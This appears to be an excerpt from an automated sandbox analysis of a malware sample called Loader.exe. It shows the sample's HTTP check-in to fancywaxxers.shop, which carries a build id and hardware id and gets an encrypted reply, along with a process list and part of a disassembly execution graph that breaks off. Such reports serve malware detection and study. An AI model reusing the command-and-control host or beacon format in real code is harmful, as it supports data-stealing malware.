                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 87
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:57:06 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 26 6a 3d 26 68 77 69 64 3d 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41
                                                                                                Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6524795094&j=&hwid=2106D7020EE20555E1B71982A10B646A
                                                                                                2025-01-01 01:57:06 UTC1131INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=ot6c8h81unn8au32di9q84079u; expires=Sat, 26 Apr 2025 19:43:45 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Niy5JcgU%2B6fY1f%2FbyVUxRZtHzH0cupZjtCt9s139tUpjgDnMPtSl6DNHs0CyxZ3%2BhmV1D0P2vki9UNnm8iqRo0nd8UIRcqm4RXfBM0wjlv6js%2Fw5f0C6FWCTrEKklJuntr2udA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee58b8df143be-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2102&min_rtt=1647&rtt_var=943&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=988&delivery_rate=1772920&cwnd=226&unsent_bytes=0&cid=488b68dcc0d06c9b&ts=488&x=0"
                                                                                                2025-01-01 01:57:06 UTC238INData Raw: 33 36 37 30 0d 0a 57 65 35 73 4a 76 33 6c 6d 70 74 51 68 4e 31 43 44 57 41 4c 51 61 4e 48 66 58 38 4a 35 5a 30 70 71 4b 69 4c 4b 36 62 70 65 70 67 43 6c 55 35 41 69 63 65 67 71 6e 79 6d 75 47 41 33 55 53 64 6a 78 32 56 48 58 57 4f 57 2b 6d 33 67 34 2b 64 48 34 39 6f 38 7a 6d 69 4d 42 32 36 2b 6b 63 44 74 45 38 32 75 41 55 73 59 59 77 44 73 4e 79 63 4a 50 6f 2f 53 47 74 43 66 7a 45 72 78 73 54 4c 63 4d 6f 41 66 52 59 79 69 7a 38 38 7a 30 70 55 55 65 44 46 6f 43 70 49 71 52 54 5a 67 6b 74 52 78 37 2b 33 4b 48 63 71 45 55 65 30 55 32 51 70 75 6a 72 2f 71 77 54 50 64 36 67 74 4d 47 48 49 78 2b 52 55 7a 42 31 2b 42 79 68 7a 71 33 2f 6c 38 78 4a 34 54 31 42 69 47 44 33 2b 73 6f 65 76 4d 4d 71 2f 70 4f 48 6c 59
                                                                                                Data Ascii: 3670We5sJv3lmptQhN1CDWALQaNHfX8J5Z0pqKiLK6bpepgClU5AicegqnymuGA3USdjx2VHXWOW+m3g4+dH49o8zmiMB26+kcDtE82uAUsYYwDsNycJPo/SGtCfzErxsTLcMoAfRYyiz88z0pUUeDFoCpIqRTZgktRx7+3KHcqEUe0U2Qpujr/qwTPd6gtMGHIx+RUzB1+Byhzq3/l8xJ4T1BiGD3+soevMMq/pOHlY
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 62 51 76 4f 4b 78 45 48 62 71 76 34 48 4f 33 5a 35 58 6e 68 6d 77 4b 6f 4f 34 77 45 61 6f 57 35 74 66 68 6e 33 5a 49 49 64 53 34 35 4a 74 6f 52 47 7a 70 74 6a 36 77 66 38 4e 6a 46 62 35 61 6e 41 71 39 76 32 43 74 67 79 49 7a 49 2f 7a 33 4d 37 68 55 31 55 58 49 6c 37 43 6f 70 43 47 62 51 38 42 6a 53 7a 74 77 66 77 34 55 58 73 33 4b 4b 48 6b 43 31 75 62 58 42 4a 4f 43 2b 49 48 77 48 61 6e 4c 57 4e 79 63 74 52 35 33 4c 54 66 2b 64 79 51 44 55 76 68 6a 4c 4e 4b 38 74 58 70 61 38 79 39 67 68 30 37 39 70 4f 56 56 2f 65 63 59 2f 45 42 4e 6c 6e 66 64 64 7a 2b 7a 44 59 4d 72 59 50 36 73 66 75 46 31 45 6c 71 33 5a 37 77 72 79 6d 67 74 2b 4d 30 30 35 79 77 59 79 4e 56 4f 54 71 32 33 6e 6d 2f 4d 63 34 59 67 74 77 42 36 6e 46 57 65 77 68 75 76 4d 42 64 43 2b 46 46 6f
                                                                                                Data Ascii: bQvOKxEHbqv4HO3Z5XnhmwKoO4wEaoW5tfhn3ZIIdS45JtoRGzptj6wf8NjFb5anAq9v2CtgyIzI/z3M7hU1UXIl7CopCGbQ8BjSztwfw4UXs3KKHkC1ubXBJOC+IHwHanLWNyctR53LTf+dyQDUvhjLNK8tXpa8y9gh079pOVV/ecY/EBNlnfddz+zDYMrYP6sfuF1Elq3Z7wrymgt+M005ywYyNVOTq23nm/Mc4YgtwB6nFWewhuvMBdC+FFo
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 57 78 4a 42 58 33 64 2b 46 48 46 78 4f 64 54 7a 4a 6f 64 33 42 47 6c 41 45 71 34 31 74 7a 4e 59 65 61 32 43 6b 34 55 55 54 66 67 44 67 34 38 54 35 33 31 61 4f 66 59 30 56 32 52 67 7a 57 72 49 64 6b 72 52 36 71 39 33 64 51 70 78 5a 41 68 66 44 64 65 46 63 41 52 4a 53 6c 38 74 50 35 69 6d 63 57 7a 59 73 2b 65 4d 38 41 65 71 79 30 51 6b 59 6a 47 74 43 58 4a 36 69 52 46 45 31 45 78 2b 53 51 6b 53 45 43 6b 35 56 44 59 38 74 6c 6c 33 72 38 65 7a 32 79 73 47 31 53 71 68 2b 33 79 48 4d 57 31 49 56 51 78 54 7a 44 30 4a 56 5a 4c 63 35 47 6c 54 4e 44 46 35 30 66 65 67 77 6e 2f 48 61 59 6e 53 70 47 67 71 64 30 47 74 62 38 70 52 53 4e 2f 47 39 55 45 4e 41 78 4b 6f 2b 56 42 36 65 66 37 63 64 44 65 45 4e 64 71 6c 6c 74 68 6e 4c 4c 43 33 42 2f 39 6e 41 39 75 45 56 77 55
                                                                                                Data Ascii: WxJBX3d+FHFxOdTzJod3BGlAEq41tzNYea2Ck4UUTfgDg48T531aOfY0V2RgzWrIdkrR6q93dQpxZAhfDdeFcARJSl8tP5imcWzYs+eM8Aeqy0QkYjGtCXJ6iRFE1Ex+SQkSECk5VDY8tll3r8ez2ysG1Sqh+3yHMW1IVQxTzD0JVZLc5GlTNDF50fegwn/HaYnSpGgqd0Gtb8pRSN/G9UENAxKo+VB6ef7cdDeENdqllthnLLC3B/9nA9uEVwU
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 78 46 31 61 52 71 38 64 7a 38 65 4e 36 41 47 65 6b 4e 6e 7a 74 45 7a 39 62 56 73 42 7a 4f 70 41 63 34 4b 31 4a 79 39 79 46 46 53 7a 79 73 7a 32 65 62 38 4f 35 4d 2f 4e 6b 71 2f 67 6d 47 43 31 44 46 76 61 4c 32 50 4f 6d 4d 4d 54 30 34 65 41 66 4a 4b 6b 6b 74 55 4c 2f 78 57 63 65 63 7a 30 4c 45 6b 43 7a 39 4c 49 77 65 52 38 79 56 77 76 41 41 37 75 77 4a 61 42 70 42 42 2b 6f 78 4f 42 49 2b 6a 76 70 45 7a 5a 75 36 55 65 4f 4f 54 75 34 77 33 7a 68 36 30 71 69 69 77 6a 6e 33 35 54 4e 6a 4d 6d 64 71 6b 6e 35 45 4f 43 4b 31 79 30 76 6b 32 75 68 6f 6c 72 4d 75 2f 77 36 45 4f 58 4f 57 6e 64 37 57 41 38 47 50 4e 55 38 45 53 43 6a 6e 45 7a 67 6c 54 4a 7a 6f 5a 5a 2f 78 76 56 72 45 67 68 79 73 59 4c 30 43 54 62 65 38 36 65 49 57 38 37 6f 76 56 54 42 4a 41 35 63 55 43
                                                                                                Data Ascii: xF1aRq8dz8eN6AGekNnztEz9bVsBzOpAc4K1Jy9yFFSzysz2eb8O5M/Nkq/gmGC1DFvaL2POmMMT04eAfJKkktUL/xWcecz0LEkCz9LIweR8yVwvAA7uwJaBpBB+oxOBI+jvpEzZu6UeOOTu4w3zh60qiiwjn35TNjMmdqkn5EOCK1y0vk2uholrMu/w6EOXOWnd7WA8GPNU8ESCjnEzglTJzoZZ/xvVrEghysYL0CTbe86eIW87ovVTBJA5cUC
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 2f 59 35 6a 70 76 47 62 45 33 69 72 4a 44 5a 6b 46 52 4b 65 75 39 71 30 42 79 4a 55 4a 58 6b 74 36 64 38 45 6b 46 41 6f 36 69 66 46 52 7a 2f 43 7a 61 63 4f 41 41 2f 51 52 76 6a 74 33 7a 4b 6e 78 30 7a 6e 57 6a 7a 5a 6c 42 55 52 34 7a 54 4d 68 55 45 33 63 2f 33 44 69 79 75 67 64 30 70 41 71 30 6a 44 63 48 6d 57 77 74 38 2f 4d 4f 73 32 58 41 56 77 57 51 78 62 5a 43 41 74 48 57 4e 66 4f 55 38 57 66 33 31 32 53 68 53 76 56 62 59 4d 2f 53 63 2b 31 79 74 49 49 78 34 63 36 4f 41 4e 52 64 75 73 56 43 53 78 6b 31 66 52 67 38 4a 6a 49 65 2b 75 61 54 71 41 58 74 79 56 63 6d 36 62 79 2b 41 6e 2b 68 53 78 38 56 58 6f 75 2b 7a 46 4f 54 6a 71 2f 2f 45 6a 6e 35 74 63 45 34 36 30 79 30 7a 65 50 57 68 4c 4c 6c 4e 48 38 4e 76 7a 6b 45 57 41 78 50 33 54 35 4c 42 34 6e 50 59
                                                                                                Data Ascii: /Y5jpvGbE3irJDZkFRKeu9q0ByJUJXkt6d8EkFAo6ifFRz/CzacOAA/QRvjt3zKnx0znWjzZlBUR4zTMhUE3c/3Diyugd0pAq0jDcHmWwt8/MOs2XAVwWQxbZCAtHWNfOU8Wf312ShSvVbYM/Sc+1ytIIx4c6OANRdusVCSxk1fRg8JjIe+uaTqAXtyVcm6by+An+hSx8VXou+zFOTjq//Ejn5tcE460y0zePWhLLlNH8NvzkEWAxP3T5LB4nPY
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 35 65 78 46 2f 4b 6f 7a 7a 47 43 42 57 78 4b 62 74 4f 72 77 48 4e 4c 73 48 69 49 46 59 53 2f 61 50 68 67 61 55 63 36 70 51 35 6a 4c 34 6c 36 56 68 52 62 67 62 36 73 59 65 74 4b 72 72 4f 38 38 36 72 55 36 56 51 39 4f 4f 4f 5a 2b 53 54 5a 72 72 50 39 62 36 38 76 54 48 38 75 78 4b 74 6f 62 32 6a 39 52 68 35 32 74 33 44 48 54 68 51 70 69 4d 7a 68 35 77 68 74 53 4b 46 36 41 30 48 2f 4e 7a 39 39 69 79 61 35 52 33 47 43 49 58 6c 4f 4d 67 64 4c 4f 45 62 4b 62 49 33 73 4a 55 54 54 77 46 53 6f 75 58 6f 33 33 52 2b 37 6b 38 31 50 6e 6d 67 72 4b 49 36 59 37 51 4c 69 68 32 50 77 69 30 37 38 31 61 7a 41 37 64 4a 63 4b 4a 7a 74 52 73 66 45 62 7a 75 54 54 57 65 43 35 49 50 6b 37 6c 7a 68 63 6e 4b 36 72 33 68 48 4f 36 68 73 37 45 56 4d 30 39 69 30 78 45 79 4b 63 37 6e 76
                                                                                                Data Ascii: 5exF/KozzGCBWxKbtOrwHNLsHiIFYS/aPhgaUc6pQ5jL4l6VhRbgb6sYetKrrO886rU6VQ9OOOZ+STZrrP9b68vTH8uxKtob2j9Rh52t3DHThQpiMzh5whtSKF6A0H/Nz99iya5R3GCIXlOMgdLOEbKbI3sJUTTwFSouXo33R+7k81PnmgrKI6Y7QLih2Pwi0781azA7dJcKJztRsfEbzuTTWeC5IPk7lzhcnK6r3hHO6hs7EVM09i0xEyKc7nv
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 4e 79 4b 46 63 52 32 6e 51 46 50 69 5a 66 4b 32 6d 50 53 75 78 56 2b 44 7a 49 44 31 44 55 71 48 58 36 50 36 55 37 4e 6e 50 6c 6c 35 61 6f 67 71 68 4b 76 46 47 69 38 6f 75 44 48 66 38 71 6b 64 69 59 5a 61 54 44 6c 44 42 55 54 54 4a 33 35 53 4e 48 43 75 32 50 6c 6e 53 44 75 47 71 38 32 61 36 6a 51 7a 2f 34 66 78 36 55 4e 4f 67 70 45 63 75 38 4c 46 43 6c 62 69 39 68 6e 36 39 2f 4e 66 4a 57 36 51 76 73 68 67 31 6c 2f 7a 4a 62 79 36 41 62 65 6c 41 41 6d 42 58 49 67 78 78 74 53 52 6d 71 6a 78 32 57 59 2b 63 42 68 34 37 30 4f 31 53 32 37 50 52 62 4f 73 64 33 33 4b 65 36 36 4c 56 55 33 65 43 36 61 42 51 6f 4e 58 6f 66 71 54 75 48 30 70 48 50 53 6d 69 6d 76 4e 62 78 55 62 35 53 53 79 64 56 6a 77 49 6f 47 55 55 39 6a 42 66 63 4f 4f 44 70 77 30 4e 4d 65 34 5a 37 36
                                                                                                Data Ascii: NyKFcR2nQFPiZfK2mPSuxV+DzID1DUqHX6P6U7NnPll5aogqhKvFGi8ouDHf8qkdiYZaTDlDBUTTJ35SNHCu2PlnSDuGq82a6jQz/4fx6UNOgpEcu8LFClbi9hn69/NfJW6Qvshg1l/zJby6AbelAAmBXIgxxtSRmqjx2WY+cBh470O1S27PRbOsd33Ke66LVU3eC6aBQoNXofqTuH0pHPSmimvNbxUb5SSydVjwIoGUU9jBfcOODpw0NMe4Z76
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 6e 68 41 4b 49 6c 52 4c 54 55 33 39 41 2b 38 5a 42 31 61 53 74 2f 47 2f 45 67 45 69 5a 50 71 75 68 72 30 64 6a 52 63 63 66 64 4c 66 51 63 33 43 35 42 6a 37 4b 75 38 67 50 43 69 58 64 31 41 31 45 43 2b 69 55 6f 56 46 50 64 30 32 32 65 6d 65 64 50 30 34 77 51 36 7a 36 71 49 6e 47 68 79 76 65 73 42 38 4b 38 46 44 78 51 51 77 4c 58 48 52 68 50 66 6f 2b 71 61 35 72 59 31 77 54 56 32 41 44 31 45 34 77 75 63 37 4f 66 38 74 67 69 39 62 41 65 49 69 46 63 46 35 55 39 43 6a 45 34 76 61 78 62 34 2f 6a 61 53 4f 33 59 46 36 41 51 68 69 35 73 71 61 50 34 33 6d 48 73 70 44 52 6c 46 32 45 51 35 42 59 63 4d 46 75 6e 32 6d 48 51 6d 4d 6c 6d 30 72 77 6f 30 69 47 34 4f 6c 36 53 33 66 6e 74 4d 64 32 55 4e 57 34 68 59 79 4c 36 50 68 73 75 58 34 7a 50 59 70 37 36 38 57 6e 57 72
                                                                                                Data Ascii: nhAKIlRLTU39A+8ZB1aSt/G/EgEiZPquhr0djRccfdLfQc3C5Bj7Ku8gPCiXd1A1EC+iUoVFPd022emedP04wQ6z6qInGhyvesB8K8FDxQQwLXHRhPfo+qa5rY1wTV2AD1E4wuc7Of8tgi9bAeIiFcF5U9CjE4vaxb4/jaSO3YF6AQhi5sqaP43mHspDRlF2EQ5BYcMFun2mHQmMlm0rwo0iG4Ol6S3fntMd2UNW4hYyL6PhsuX4zPYp768WnWr
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 2f 43 47 6e 4d 69 4b 4c 53 5a 66 4f 58 4b 45 6f 6a 52 6e 66 54 64 56 59 5a 52 4e 33 2f 59 5a 6e 79 35 45 50 46 69 30 6e 52 46 34 59 56 51 36 65 39 38 75 4d 4b 38 49 55 41 54 31 4a 74 46 76 51 77 46 45 64 49 69 4e 52 77 34 64 4c 35 51 63 54 64 51 75 49 78 31 67 70 2b 6b 49 79 72 34 32 6e 33 74 58 56 46 4c 6a 49 74 36 67 38 34 47 44 69 38 38 6d 48 78 33 4e 4a 6d 35 61 59 2f 32 7a 71 73 43 31 36 79 6c 4b 2f 74 50 4f 36 4e 42 48 56 55 5a 69 44 74 44 7a 56 4e 63 4b 4b 6c 53 70 72 46 33 6e 2f 6e 72 53 4b 70 63 74 35 55 5a 5a 4f 4b 32 63 73 30 36 65 55 79 52 42 56 44 4d 39 6f 79 54 55 74 2f 69 39 68 54 6e 76 4c 66 59 63 32 63 48 4d 30 50 31 79 51 4e 74 4a 32 73 30 51 79 72 69 44 68 39 45 6c 77 6c 31 43 6b 66 56 46 79 4e 31 45 6a 51 36 65 39 36 79 39 77 5a 31 77
                                                                                                Data Ascii: /CGnMiKLSZfOXKEojRnfTdVYZRN3/YZny5EPFi0nRF4YVQ6e98uMK8IUAT1JtFvQwFEdIiNRw4dL5QcTdQuIx1gp+kIyr42n3tXVFLjIt6g84GDi88mHx3NJm5aY/2zqsC16ylK/tPO6NBHVUZiDtDzVNcKKlSprF3n/nrSKpct5UZZOK2cs06eUyRBVDM9oyTUt/i9hTnvLfYc2cHM0P1yQNtJ2s0QyriDh9Elwl1CkfVFyN1EjQ6e96y9wZ1w


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:20:56:53
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xd30000
                                                                                                File size:822'784 bytes
                                                                                                MD5 hash:0792FCE4557CAE0687A02E5E41BE587A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:20:56:53
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:20:56:54
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xd30000
                                                                                                File size:822'784 bytes
                                                                                                MD5 hash:0792FCE4557CAE0687A02E5E41BE587A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                                  Signature Coverage:1.1%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:35
                                                                                                  execution_graph 20123 d351f0 20124 d3520f 20123->20124 20125 d35237 20123->20125 20129 d35390 20124->20129 20133 d35440 20125->20133 20127 d3522f 20130 d353da std::ios_base::_Init 20129->20130 20137 d35530 20130->20137 20134 d35487 std::ios_base::_Init 20133->20134 20135 d35530 std::ios_base::_Init 30 API calls 20134->20135 20136 d354bc 20135->20136 20136->20127 20150 d35730 20137->20150 20141 d3556f std::ios_base::_Init 20142 d35730 std::ios_base::_Init 5 API calls 20141->20142 20147 d355a8 std::ios_base::_Init 20141->20147 20143 d35602 20142->20143 20157 d35850 20143->20157 20148 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20147->20148 20149 d353f9 20148->20149 20149->20127 20151 d3574b std::ios_base::_Init 20150->20151 20152 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20151->20152 20153 d3555d 20152->20153 20153->20141 20154 d357b0 20153->20154 20164 d37974 20154->20164 20159 d3587e std::ios_base::_Init 20157->20159 20158 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20160 d35619 20158->20160 20159->20158 20161 d358f0 20160->20161 20178 d35990 20161->20178 20169 d37a0d 20164->20169 20167 d3a45c CallUnexpected RaiseException 20168 d37993 20167->20168 20172 d367c0 20169->20172 20173 d36801 std::invalid_argument::invalid_argument 20172->20173 20174 d3aa5d ___std_exception_copy 29 API calls 20173->20174 20175 d36820 20174->20175 20176 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20175->20176 20177 d3682a 20176->20177 20177->20167 20181 d359b0 20178->20181 20182 d359c7 std::ios_base::_Init 20181->20182 20185 d32b20 20182->20185 20186 d32b3f 20185->20186 20191 d32b33 20185->20191 20187 d32b5f 20186->20187 20188 d32b4c 20186->20188 20200 d32c30 20187->20200 20192 d32bc0 20188->20192 20191->20147 20193 d32be3 20192->20193 20194 d32bde 20192->20194 20196 d32c30 std::ios_base::_Init 3 API calls 20193->20196 20203 d32c50 20194->20203 20197 d32bee 20196->20197 20198 d32bfb 20197->20198 20207 d41a0f 20197->20207 20198->20191 20201 d37153 std::ios_base::_Init 3 API calls 20200->20201 20202 d32c42 20201->20202 20202->20191 20204 d32c68 std::ios_base::_Init 20203->20204 20205 d3a45c CallUnexpected RaiseException 20204->20205 20206 d32c7d 20205->20206 20208 d41c4e __strnicoll 29 API calls 20207->20208 20209 d41a1e 20208->20209 20210 d41a2c __Getctype 11 API calls 20209->20210 20211 d41a2b 20210->20211 18754 d38af0 18755 d38aff 18754->18755 18757 d38b23 18755->18757 18758 d4304b 18755->18758 18759 d4305e _Fputc 18758->18759 18762 d430b8 18759->18762 18761 d43073 _Fputc 18761->18757 18763 d430ed 18762->18763 18764 d430ca 18762->18764 18763->18764 18767 d43114 18763->18767 18765 d41ba8 __strnicoll 29 API calls 18764->18765 18766 d430e5 18765->18766 18766->18761 18770 d431ee 18767->18770 18771 d431fa ___scrt_is_nonwritable_in_current_image 18770->18771 18778 d3d13f EnterCriticalSection 18771->18778 18773 d43208 18779 d4314e 18773->18779 18775 d43215 18788 d4323d 18775->18788 18778->18773 18780 d421e8 ___scrt_uninitialize_crt 73 API calls 18779->18780 18781 d43169 18780->18781 18791 d47f9d 18781->18791 18784 d469f4 __dosmaperr 14 API calls 18785 d431b2 18784->18785 18786 d456b7 ___free_lconv_mon 14 API calls 18785->18786 18787 d4318e 18786->18787 18787->18775 18795 d3d153 LeaveCriticalSection 18788->18795 18790 d4314c 18790->18761 18792 d47fb4 18791->18792 18793 d43173 18791->18793 18792->18793 18794 d456b7 ___free_lconv_mon 14 API calls 18792->18794 18793->18784 18793->18787 18794->18793 18795->18790 18630 d370f0 18635 d38e7d 18630->18635 18632 d37103 18639 d37294 18632->18639 18636 d38e89 __EH_prolog3 18635->18636 18642 d38da7 18636->18642 18638 d38edb std::ios_base::_Init 18638->18632 18707 d372a9 18639->18707 18651 d37f7f 18642->18651 18644 d38db2 18659 d36c10 18644->18659 18646 d38dc5 18647 d38ddf 18646->18647 18648 d34e30 std::ios_base::_Init 39 API calls 18646->18648 18649 d38deb 18647->18649 18663 d39dcd 18647->18663 18648->18647 18649->18638 18652 d37f8b __EH_prolog3 18651->18652 18653 d34e30 std::ios_base::_Init 39 API calls 18652->18653 18654 d37fbc 18653->18654 18655 d37153 std::ios_base::_Init 3 API calls 18654->18655 18656 d37fc3 18655->18656 18658 d37fd4 std::ios_base::_Init 18656->18658 18668 d377f2 18656->18668 18658->18644 18660 d36c57 18659->18660 18661 d331c0 77 API calls 18660->18661 18662 d36c6d std::ios_base::_Ios_base_dtor 18661->18662 18662->18646 18664 d374e4 std::_Lockit::_Lockit 7 API calls 18663->18664 18665 d39ddb 18664->18665 18666 d37515 std::_Lockit::~_Lockit 2 API calls 18665->18666 18667 d39e16 18666->18667 18667->18649 18669 d377fe __EH_prolog3 18668->18669 18670 d374e4 std::_Lockit::_Lockit 7 API calls 18669->18670 18671 d37809 18670->18671 18677 d3783a 18671->18677 18680 d376ef 18671->18680 18673 d3781c 18686 d37885 18673->18686 18674 d37515 std::_Lockit::~_Lockit 2 API calls 18675 d37877 std::ios_base::_Init 18674->18675 18675->18658 18677->18674 18681 d37153 std::ios_base::_Init 3 API calls 18680->18681 18682 d376fa 18681->18682 18683 d3770e 18682->18683 18694 d37783 18682->18694 18683->18673 18687 d37824 18686->18687 18688 d37891 18686->18688 18690 d37670 18687->18690 18697 d39c74 18688->18697 18691 d3767e 18690->18691 18693 d3768a _Yarn 18690->18693 18692 d42a5e __freea 14 API calls 18691->18692 18691->18693 18692->18693 18693->18677 18695 d37670 _Yarn 14 API calls 18694->18695 18696 d3770c 18695->18696 18696->18673 18698 d39c84 EncodePointer 18697->18698 18700 d41f83 18697->18700 18698->18687 18698->18700 18699 d47ae0 CallUnexpected 2 API calls 18699->18700 18700->18699 18701 d41f9d IsProcessorFeaturePresent 18700->18701 18702 d47b07 CallUnexpected 48 API calls 18700->18702 18703 d3f18f CallUnexpected 21 API calls 18700->18703 18704 d41a60 CallUnexpected 8 API calls 18700->18704 18705 d4446d __CreateFrameInfo 23 API calls 18700->18705 18706 d4446c 18700->18706 18701->18700 18702->18700 18703->18700 18704->18700 18705->18700 18706->18687 18708 d372b8 18707->18708 18709 d372bf 18707->18709 18713 d4106c 18708->18713 18716 d40ffb 18709->18716 18712 d3710d 18714 d40ffb std::ios_base::_Init 32 API calls 18713->18714 18715 d4107e 18714->18715 18715->18712 18719 d4125e 18716->18719 18720 d4126a ___scrt_is_nonwritable_in_current_image 18719->18720 18727 d41d11 EnterCriticalSection 18720->18727 18722 d41278 18728 d41082 18722->18728 18724 d41285 18738 d412ad 18724->18738 18727->18722 18729 d4109d 18728->18729 18737 d41110 std::_Lockit::_Lockit 18728->18737 18730 d410f0 18729->18730 18731 d4c065 std::ios_base::_Init 32 API calls 18729->18731 18729->18737 18732 d4c065 std::ios_base::_Init 32 API calls 18730->18732 18730->18737 18733 d410e6 18731->18733 18734 d41106 18732->18734 18735 d456b7 ___free_lconv_mon 14 API calls 18733->18735 18736 d456b7 ___free_lconv_mon 14 API calls 18734->18736 18735->18730 18736->18737 18737->18724 18741 d41d28 LeaveCriticalSection 18738->18741 18740 d4102c 18740->18712 18741->18740 20216 d45bf0 20217 d45bfb 20216->20217 20221 d45c0b 20216->20221 20222 d45cf5 20217->20222 20220 d456b7 ___free_lconv_mon 14 API calls 20220->20221 20223 d45d10 20222->20223 20224 d45d0a 20222->20224 20226 d456b7 ___free_lconv_mon 14 API calls 20223->20226 20225 d456b7 ___free_lconv_mon 14 API calls 20224->20225 20225->20223 20227 d45d1c 20226->20227 20228 d456b7 ___free_lconv_mon 14 API calls 20227->20228 20229 d45d27 20228->20229 20230 d456b7 ___free_lconv_mon 14 API calls 20229->20230 20231 d45d32 20230->20231 20232 d456b7 ___free_lconv_mon 14 API calls 20231->20232 20233 d45d3d 20232->20233 20234 d456b7 ___free_lconv_mon 14 API calls 20233->20234 20235 d45d48 20234->20235 20236 d456b7 ___free_lconv_mon 14 API calls 20235->20236 20237 d45d53 20236->20237 20238 d456b7 ___free_lconv_mon 14 API calls 20237->20238 20239 d45d5e 20238->20239 20240 d456b7 ___free_lconv_mon 14 API calls 20239->20240 20241 d45d69 20240->20241 20242 d456b7 ___free_lconv_mon 14 API calls 20241->20242 20243 d45d77 20242->20243 20248 d45e6e 20243->20248 20249 d45e7a ___scrt_is_nonwritable_in_current_image 20248->20249 20264 d41d11 EnterCriticalSection 20249->20264 20251 d45e84 20254 d456b7 ___free_lconv_mon 14 API calls 20251->20254 20255 d45eae 20251->20255 20254->20255 20265 d45ecd 20255->20265 20256 d45ed9 20257 d45ee5 ___scrt_is_nonwritable_in_current_image 20256->20257 20269 d41d11 EnterCriticalSection 20257->20269 20259 d45eef 20260 d45c11 __dosmaperr 14 API calls 20259->20260 20261 d45f02 20260->20261 20270 d45f22 20261->20270 20264->20251 20268 d41d28 LeaveCriticalSection 20265->20268 20267 d45d9d 20267->20256 20268->20267 20269->20259 20273 d41d28 LeaveCriticalSection 20270->20273 20272 d45c03 20272->20220 20273->20272 20449 d38990 20450 d389a4 20449->20450 20451 d38bf5 78 API calls 20450->20451 20456 d389ff 20450->20456 20452 d389cf 20451->20452 20453 d389ec 20452->20453 20454 d413c4 76 API calls 20452->20454 20452->20456 20453->20456 20457 d425ea 20453->20457 20454->20453 20458 d425f5 20457->20458 20459 d4260a 20457->20459 20460 d41314 __dosmaperr 14 API calls 20458->20460 20461 d42627 20459->20461 20462 d42612 20459->20462 20464 d425fa 20460->20464 20471 d4c336 20461->20471 20465 d41314 __dosmaperr 14 API calls 